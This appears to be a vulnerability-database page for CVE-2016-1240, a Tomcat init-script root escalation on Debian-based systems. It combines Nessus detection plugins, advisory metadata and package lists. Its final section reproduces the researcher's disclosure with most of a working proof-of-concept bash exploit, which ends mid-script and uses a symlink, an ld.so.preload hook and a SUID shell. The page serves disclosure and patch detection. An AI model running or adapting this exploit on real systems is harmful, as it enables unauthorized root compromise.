        else audit(AUDIT_PACKAGE_NOT_INSTALLED, "hibernate4-c3p0-eap6 / hibernate4-core-eap6 / hibernate4-eap6 / etc");
      }
    }
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DLA-623.NASL
    descriptionDawid Golunski from legalhackers.com discovered that Debian
    last seen2020-03-17
    modified2016-09-16
    plugin id93545
    published2016-09-16
    reporterThis script is Copyright (C) 2016-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/93545
    titleDebian DLA-623-1 : tomcat7 security update
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Debian Security Advisory DLA-623-1. The text
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(93545);
      script_version("2.7");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/12");
    
      script_cve_id("CVE-2016-1240");
    
      script_name(english:"Debian DLA-623-1 : tomcat7 security update");
      script_summary(english:"Checks dpkg output for the updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski from legalhackers.com discovered that Debian's version
    of Tomcat 7 was vulnerable to a local privilege escalation. Local
    attackers who have gained access to the server in the context of the
    tomcat7 user through a vulnerability in a web application were able to
    replace the file with a symlink to an arbitrary file.
    
    The full advisory can be found at
    
    http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-
    Escalation-Exploit.txt
    
    In addition this security update also fixes Debian bug #821391. File
    ownership in /etc/tomcat7 will no longer be unconditionally overridden
    on upgrade. As another precaution the file permissions of Debian
    specific configuration files in /etc/tomcat7 were changed to 640 to
    disallow world readable access.
    
    For Debian 7 'Wheezy', these problems have been fixed in version
    7.0.28-4+deb7u6.
    
    We recommend that you upgrade your tomcat7 packages.
    
    NOTE: Tenable Network Security has extracted the preceding description
    block directly from the DLA security advisory. Tenable has attempted
    to automatically clean and format it as much as possible without
    introducing additional issues."
      );
      # http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?f1cb3176"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://lists.debian.org/debian-lts-announce/2016/09/msg00016.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/wheezy/tomcat7"
      );
      script_set_attribute(attribute:"solution", value:"Upgrade the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libservlet3.0-java");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libtomcat7-java");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat7");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat7-admin");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat7-common");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat7-docs");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat7-examples");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat7-user");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:7.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2016/09/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/16");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2016-2020 Tenable Network Security, Inc.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"7.0", prefix:"libservlet3.0-java", reference:"7.0.28-4+deb7u6")) flag++;
    if (deb_check(release:"7.0", prefix:"libservlet3.0-java-doc", reference:"7.0.28-4+deb7u6")) flag++;
    if (deb_check(release:"7.0", prefix:"libtomcat7-java", reference:"7.0.28-4+deb7u6")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat7", reference:"7.0.28-4+deb7u6")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat7-admin", reference:"7.0.28-4+deb7u6")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat7-common", reference:"7.0.28-4+deb7u6")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat7-docs", reference:"7.0.28-4+deb7u6")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat7-examples", reference:"7.0.28-4+deb7u6")) flag++;
    if (deb_check(release:"7.0", prefix:"tomcat7-user", reference:"7.0.28-4+deb7u6")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-3669.NASL
    descriptionDawid Golunski of LegalHackers discovered that the Tomcat init script performed unsafe file handling, which could result in local privilege escalation.
    last seen2020-06-01
    modified2020-06-02
    plugin id93548
    published2016-09-16
    reporterThis script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93548
    titleDebian DSA-3669-1 : tomcat7 - security update
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Debian Security Advisory DSA-3669. The text 
    # itself is copyright (C) Software in the Public Interest, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(93548);
      script_version("2.7");
      script_cvs_date("Date: 2018/11/10 11:49:38");
    
      script_cve_id("CVE-2016-1240");
      script_xref(name:"DSA", value:"3669");
    
      script_name(english:"Debian DSA-3669-1 : tomcat7 - security update");
      script_summary(english:"Checks dpkg output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Debian host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski of LegalHackers discovered that the Tomcat init script
    performed unsafe file handling, which could result in local privilege
    escalation."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://packages.debian.org/source/jessie/tomcat7"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.debian.org/security/2016/dsa-3669"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Upgrade the tomcat7 packages.
    
    For the stable distribution (jessie), this problem has been fixed in
    version 7.0.56-3+deb8u4."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:tomcat7");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2016/09/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/16");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Debian Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("debian_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
    if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    if (deb_check(release:"8.0", prefix:"libservlet3.0-java", reference:"7.0.56-3+deb8u4")) flag++;
    if (deb_check(release:"8.0", prefix:"libservlet3.0-java-doc", reference:"7.0.56-3+deb8u4")) flag++;
    if (deb_check(release:"8.0", prefix:"libtomcat7-java", reference:"7.0.56-3+deb8u4")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat7", reference:"7.0.56-3+deb8u4")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat7-admin", reference:"7.0.56-3+deb8u4")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat7-common", reference:"7.0.56-3+deb8u4")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat7-docs", reference:"7.0.56-3+deb8u4")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat7-examples", reference:"7.0.56-3+deb8u4")) flag++;
    if (deb_check(release:"8.0", prefix:"tomcat7-user", reference:"7.0.56-3+deb8u4")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201705-09.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201705-09 (Apache Tomcat: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Tomcat. Please review the CVE identifiers referenced below for details. Impact : A remote attacker may be able to cause a Denial of Service condition, obtain sensitive information, bypass protection mechanisms and authentication restrictions. A local attacker, who is a tomcat&rsquo;s system user or belongs to tomcat&rsquo;s group, could potentially escalate privileges. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id100262
    published2017-05-18
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/100262
    titleGLSA-201705-09 : Apache Tomcat: Multiple vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Gentoo Linux Security Advisory GLSA 201705-09.
    #
    # The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.
    # and licensed under the Creative Commons - Attribution / Share Alike 
    # license. See http://creativecommons.org/licenses/by-sa/3.0/
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(100262);
      script_version("3.7");
      script_cvs_date("Date: 2019/04/10 16:10:17");
    
      script_cve_id("CVE-2015-5174", "CVE-2015-5345", "CVE-2015-5346", "CVE-2015-5351", "CVE-2016-0706", "CVE-2016-0714", "CVE-2016-0763", "CVE-2016-1240", "CVE-2016-3092", "CVE-2016-8745", "CVE-2017-5647", "CVE-2017-5648", "CVE-2017-5650", "CVE-2017-5651");
      script_xref(name:"GLSA", value:"201705-09");
    
      script_name(english:"GLSA-201705-09 : Apache Tomcat: Multiple vulnerabilities");
      script_summary(english:"Checks for updated package(s) in /var/db/pkg");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Gentoo host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote host is affected by the vulnerability described in GLSA-201705-09
    (Apache Tomcat: Multiple vulnerabilities)
    
        Multiple vulnerabilities have been discovered in Tomcat. Please review
          the CVE identifiers referenced below for details.
      
    Impact :
    
        A remote attacker may be able to cause a Denial of Service condition,
          obtain sensitive information, bypass protection mechanisms and
          authentication restrictions.
        A local attacker, who is a tomcat&rsquo;s system user or belongs to
          tomcat&rsquo;s group, could potentially escalate privileges.
      
    Workaround :
    
        There is no known workaround at this time."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://security.gentoo.org/glsa/201705-09"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "All Apache Tomcat users have to manually check their Tomcat runscripts
          to make sure that they don&rsquo;t use an old, vulnerable runscript. In
          addition:
        All Apache Tomcat 7 users should upgrade to the latest version:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=www-servers/tomcat-7.0.70:7'
        All Apache Tomcat 8 users should upgrade to the latest version:
          # emerge --sync
          # emerge --ask --oneshot --verbose '>=www-servers/tomcat-8.0.36:8'"
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:tomcat");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2017/05/18");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/18");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Gentoo Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("qpkg.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
    if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (qpkg_check(package:"www-servers/tomcat", unaffected:make_list("ge 8.0.36", "ge 7.0.70"), vulnerable:make_list("lt 8.0.36"))) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = qpkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Apache Tomcat");
    }
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/138940/tomcat80362-escalate.txt
idPACKETSTORM:138940
last seen2016-12-05
published2016-10-02
reporterDawid Golunski
sourcehttps://packetstormsecurity.com/files/138940/Apache-Tomcat-8.0.36-2-Privilege-Escalation.html
titleApache Tomcat 8.0.36-2 Privilege Escalation

Redhat

advisories
  • rhsa
    idRHSA-2017:0455
  • rhsa
    idRHSA-2017:0456
  • rhsa
    idRHSA-2017:0457
rpms
  • hibernate4-c3p0-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el6
  • hibernate4-core-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el6
  • hibernate4-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el6
  • hibernate4-entitymanager-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el6
  • hibernate4-envers-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el6
  • jbcs-httpd24-apache-commons-daemon-0:1.0.15-1.redhat_2.1.jbcs.el6
  • jbcs-httpd24-apache-commons-daemon-jsvc-1:1.0.15-17.redhat_2.jbcs.el6
  • jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1:1.0.15-17.redhat_2.jbcs.el6
  • jbcs-httpd24-runtime-0:1-3.jbcs.el6
  • mod_cluster-0:1.3.5-2.Final_redhat_2.1.ep7.el6
  • mod_cluster-tomcat7-0:1.3.5-2.Final_redhat_2.1.ep7.el6
  • mod_cluster-tomcat8-0:1.3.5-2.Final_redhat_2.1.ep7.el6
  • tomcat-native-0:1.2.8-9.redhat_9.ep7.el6
  • tomcat-native-debuginfo-0:1.2.8-9.redhat_9.ep7.el6
  • tomcat-vault-0:1.0.8-9.Final_redhat_2.1.ep7.el6
  • tomcat7-0:7.0.70-16.ep7.el6
  • tomcat7-admin-webapps-0:7.0.70-16.ep7.el6
  • tomcat7-docs-webapp-0:7.0.70-16.ep7.el6
  • tomcat7-el-2.2-api-0:7.0.70-16.ep7.el6
  • tomcat7-javadoc-0:7.0.70-16.ep7.el6
  • tomcat7-jsp-2.2-api-0:7.0.70-16.ep7.el6
  • tomcat7-jsvc-0:7.0.70-16.ep7.el6
  • tomcat7-lib-0:7.0.70-16.ep7.el6
  • tomcat7-log4j-0:7.0.70-16.ep7.el6
  • tomcat7-selinux-0:7.0.70-16.ep7.el6
  • tomcat7-servlet-3.0-api-0:7.0.70-16.ep7.el6
  • tomcat7-webapps-0:7.0.70-16.ep7.el6
  • tomcat8-0:8.0.36-17.ep7.el6
  • tomcat8-admin-webapps-0:8.0.36-17.ep7.el6
  • tomcat8-docs-webapp-0:8.0.36-17.ep7.el6
  • tomcat8-el-2.2-api-0:8.0.36-17.ep7.el6
  • tomcat8-javadoc-0:8.0.36-17.ep7.el6
  • tomcat8-jsp-2.3-api-0:8.0.36-17.ep7.el6
  • tomcat8-jsvc-0:8.0.36-17.ep7.el6
  • tomcat8-lib-0:8.0.36-17.ep7.el6
  • tomcat8-log4j-0:8.0.36-17.ep7.el6
  • tomcat8-selinux-0:8.0.36-17.ep7.el6
  • tomcat8-servlet-3.1-api-0:8.0.36-17.ep7.el6
  • tomcat8-webapps-0:8.0.36-17.ep7.el6
  • hibernate4-c3p0-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el7
  • hibernate4-core-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el7
  • hibernate4-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el7
  • hibernate4-entitymanager-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el7
  • hibernate4-envers-eap6-0:4.2.23-1.Final_redhat_1.1.ep6.el7
  • jbcs-httpd24-apache-commons-daemon-0:1.0.15-1.redhat_2.1.jbcs.el7
  • jbcs-httpd24-apache-commons-daemon-jsvc-1:1.0.15-17.redhat_2.jbcs.el7
  • jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1:1.0.15-17.redhat_2.jbcs.el7
  • jbcs-httpd24-runtime-0:1-3.jbcs.el7
  • mod_cluster-0:1.3.5-2.Final_redhat_2.1.ep7.el7
  • mod_cluster-tomcat7-0:1.3.5-2.Final_redhat_2.1.ep7.el7
  • mod_cluster-tomcat8-0:1.3.5-2.Final_redhat_2.1.ep7.el7
  • tomcat-native-0:1.2.8-9.redhat_9.ep7.el7
  • tomcat-native-debuginfo-0:1.2.8-9.redhat_9.ep7.el7
  • tomcat-vault-0:1.0.8-9.Final_redhat_2.1.ep7.el7
  • tomcat7-0:7.0.70-16.ep7.el7
  • tomcat7-admin-webapps-0:7.0.70-16.ep7.el7
  • tomcat7-docs-webapp-0:7.0.70-16.ep7.el7
  • tomcat7-el-2.2-api-0:7.0.70-16.ep7.el7
  • tomcat7-javadoc-0:7.0.70-16.ep7.el7
  • tomcat7-jsp-2.2-api-0:7.0.70-16.ep7.el7
  • tomcat7-jsvc-0:7.0.70-16.ep7.el7
  • tomcat7-lib-0:7.0.70-16.ep7.el7
  • tomcat7-log4j-0:7.0.70-16.ep7.el7
  • tomcat7-selinux-0:7.0.70-16.ep7.el7
  • tomcat7-servlet-3.0-api-0:7.0.70-16.ep7.el7
  • tomcat7-webapps-0:7.0.70-16.ep7.el7
  • tomcat8-0:8.0.36-17.ep7.el7
  • tomcat8-admin-webapps-0:8.0.36-17.ep7.el7
  • tomcat8-docs-webapp-0:8.0.36-17.ep7.el7
  • tomcat8-el-2.2-api-0:8.0.36-17.ep7.el7
  • tomcat8-javadoc-0:8.0.36-17.ep7.el7
  • tomcat8-jsp-2.3-api-0:8.0.36-17.ep7.el7
  • tomcat8-jsvc-0:8.0.36-17.ep7.el7
  • tomcat8-lib-0:8.0.36-17.ep7.el7
  • tomcat8-log4j-0:8.0.36-17.ep7.el7
  • tomcat8-selinux-0:8.0.36-17.ep7.el7
  • tomcat8-servlet-3.1-api-0:8.0.36-17.ep7.el7
  • tomcat8-webapps-0:8.0.36-17.ep7.el7

Seebug

bulletinFamilyexploit
descriptionI. VULNERABILITY ------------------------- Apache Tomcat® packaging on Debian-based distros - Local Root Privilege Escalation Affected debian packages: Tomcat 8 <= 8.0.36-2 Tomcat 7 <= 7.0.70-2 Tomcat 6 <= 6.0.45+dfsg-1~deb8u1 Ubuntu systems are also affected. See section VII. for details. Other systems using the affected debian packages may also be affected. II. BACKGROUND ------------------------- "The Apache Tomcat software is an open source implementation of the Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket technologies. The Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket specifications are developed under the Java Community Process. The Apache Tomcat software is developed in an open and participatory environment and released under the Apache License version 2. The Apache Tomcat project is intended to be a collaboration of the best-of-breed developers from around the world. Apache Tomcat software powers numerous large-scale, mission-critical web applications across a diverse range of industries and organizations. Some of these users and their stories are listed on the PoweredBy wiki page. " http://tomcat.apache.org/ III. INTRODUCTION ------------------------- Tomcat (6, 7, 8) packages provided by default repositories on Debian-based distributions (including Debian, Ubuntu etc.) provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account (for example, by exploiting an RCE vulnerability in a java web application hosted on Tomcat, uploading a webshell etc.) to escalate their privileges from tomcat user to root and fully compromise the target system. IV. DESCRIPTION ------------------------- The vulnerability is located in the tomcat init script provided by affected packages, normally installed at /etc/init.d/tomcatN. The script for tomcat7 contains the following lines: ``` -----[tomcat7]---- # Run the catalina.sh script as a daemon set +e touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out -------[eof]------ ``` Local attackers who have gained access to the server in the context of the tomcat user (for example, through a vulnerability in a web application) would be able to replace the log file with a symlink to an arbitrary system file and escalate their privileges to root once Tomcat init script (running as root) re-opens the catalina.out file after a service restart, reboot etc. As attackers would already have a tomcat account at the time of exploitation, they could also kill the tomcat processes to introduce the need for a restart. V. PROOF OF CONCEPT EXPLOIT ------------------------- ``` ------[ tomcat-rootprivesc-deb.sh ]------ #!/bin/bash # # Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit # # CVE-2016-1240 # # Discovered and coded by: # # Dawid Golunski # http://legalhackers.com # # This exploit targets Tomcat (versions 6, 7 and 8) packaging on # Debian-based distros including Debian, Ubuntu etc. # It allows attackers with a tomcat shell (e.g. obtained remotely through a # vulnerable java webapp, or locally via weak permissions on webapps in the # Tomcat webroot directories etc.) to escalate their privileges to root. # # Usage: # ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] # # The exploit can used in two ways: # # -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly # gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. # It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up # a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) # # -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to # /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. # Attackers can come back at a later time and check on the /etc/default/locale file. Upon a # Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can # then add arbitrary commands to the file which will be executed with root privileges by # the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default # Ubuntu/Debian Tomcat installations). # # See full advisory for details at: # http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/tomcatrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $TOMCATLOG touch $TOMCATLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload 2>/dev/null fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." cleanexit 0 } #intro echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n" exit 3 fi if [ "$2" = "-deferred" ]; then mode="deferred" else mode="active" fi # Priv check echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`" id | grep -q tomcat if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n" exit 3 fi # Set target paths TOMCATLOG="$1" if [ ! -f $TOMCATLOG ]; then echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n" exit 3 fi echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG" # [ Deferred exploitation ] # Symlink the log file to /etc/default/locale file which gets executed daily on default # tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. # Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been # restarted and file owner gets changed. if [ "$mode" = "deferred" ]; then rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`" echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot" echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges" echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\n\n" exit 0 fi # [ Active exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." cleanexit 2 fi # Symlink the log file to ld.so.preload rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" # Wait for Tomcat to re-open the logs echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..." echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)" while :; do sleep 0.1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload break; fi done # /etc/ld.so.preload file should be owned by tomcat user at this point # Inject the privesc.so shared library to escalate privileges echo $PRIVESCLIB > /etc/ld.so.preload echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" sudo --help 2>/dev/null >/dev/null # Check for the 